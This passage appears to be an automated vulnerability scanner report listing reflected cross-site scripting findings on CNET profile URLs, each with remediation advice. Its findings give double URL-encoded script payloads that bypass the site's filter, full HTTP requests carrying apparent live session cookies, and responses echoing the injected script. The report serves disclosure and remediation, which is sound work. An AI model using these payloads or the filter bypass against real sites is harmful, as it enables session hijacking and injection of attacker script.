Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=987
Connection: Keep-Alive
Content-Length: 31135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Leslie Katzbb1ab"><script>alert(1)</script>5ed168db2c"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2114e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd2a882254e was submitted in the REST URL parameter 2. This input was echoed as 2114e"><script>alert(1)</script>bd2a882254e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MEPace2114e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd2a882254e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:32 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:32 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=953
Connection: Keep-Alive
Content-Length: 31083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="MEPace2114e"><script>alert(1)</script>bd2a882254e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e11a4%253cscript%253ealert%25281%2529%253c%252fscript%253e05d9e459082 was submitted in the REST URL parameter 2. This input was echoed as e11a4<script>alert(1)</script>05d9e459082 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MEPacee11a4%253cscript%253ealert%25281%2529%253c%252fscript%253e05d9e459082/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:34 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:34 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=990
Connection: Keep-Alive
Content-Length: 30998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>MEPacee11a4<script>alert(1)</script>05d9e459082's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ab8b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e675ddd9df60 was submitted in the REST URL parameter 2. This input was echoed as 6ab8b"><script>alert(1)</script>675ddd9df60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Maggie+Reardon6ab8b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e675ddd9df60/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:22 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:22 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Length: 31205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Maggie Reardon6ab8b"><script>alert(1)</script>675ddd9df60"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d4e8%253cscript%253ealert%25281%2529%253c%252fscript%253e05a7b0e3d48 was submitted in the REST URL parameter 2. This input was echoed as 3d4e8<script>alert(1)</script>05a7b0e3d48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Maggie+Reardon3d4e8%253cscript%253ealert%25281%2529%253c%252fscript%253e05a7b0e3d48/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:23 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:24 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=973
Connection: Keep-Alive
Content-Length: 31146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Maggie Reardon3d4e8<script>alert(1)</script>05a7b0e3d48's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f53d546bc6 was submitted in the REST URL parameter 2. This input was echoed as c93ec"><script>alert(1)</script>3f53d546bc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Matt+Asayc93ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f53d546bc6/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:16 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:16 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 31075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="Matt Asayc93ec"><script>alert(1)</script>3f53d546bc6"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ca32%253cscript%253ealert%25281%2529%253c%252fscript%253e867bbd93cb4 was submitted in the REST URL parameter 2. This input was echoed as 2ca32<script>alert(1)</script>867bbd93cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Matt+Asay2ca32%253cscript%253ealert%25281%2529%253c%252fscript%253e867bbd93cb4/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:17 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:17 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=946
Connection: Keep-Alive
Content-Length: 31044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>Matt Asay2ca32<script>alert(1)</script>867bbd93cb4's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb7ce%253cscript%253ealert%25281%2529%253c%252fscript%253e737ce974169 was submitted in the REST URL parameter 2. This input was echoed as eb7ce<script>alert(1)</script>737ce974169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MattRosoffeb7ce%253cscript%253ealert%25281%2529%253c%252fscript%253e737ce974169/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:20 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:20 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=977
Connection: Keep-Alive
Content-Length: 31041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>MattRosoffeb7ce<script>alert(1)</script>737ce974169's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8dd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb25b67b9bcd was submitted in the REST URL parameter 2. This input was echoed as e8dd2"><script>alert(1)</script>b25b67b9bcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MattRosoffe8dd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb25b67b9bcd/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:19 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:19 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Length: 31087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="MattRosoffe8dd2"><script>alert(1)</script>b25b67b9bcd"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a04c0%253cscript%253ealert%25281%2529%253c%252fscript%253e05f1eb9883b was submitted in the REST URL parameter 2. This input was echoed as a04c0<script>alert(1)</script>05f1eb9883b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MoskovciakMa04c0%253cscript%253ealert%25281%2529%253c%252fscript%253e05f1eb9883b/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:02 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:02 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=972
Connection: Keep-Alive
Content-Length: 31097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>MoskovciakMa04c0<script>alert(1)</script>05f1eb9883b's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5386%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadefb11b575 was submitted in the REST URL parameter 2. This input was echoed as d5386"><script>alert(1)</script>adefb11b575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/MoskovciakMd5386%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadefb11b575/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:01 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:01 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Length: 31106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="MoskovciakMd5386"><script>alert(1)</script>adefb11b575"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aae89%253cscript%253ealert%25281%2529%253c%252fscript%253e80beff7c63a was submitted in the REST URL parameter 2. This input was echoed as aae89<script>alert(1)</script>80beff7c63a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Nicole+Leeaae89%253cscript%253ealert%25281%2529%253c%252fscript%253e80beff7c63a/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
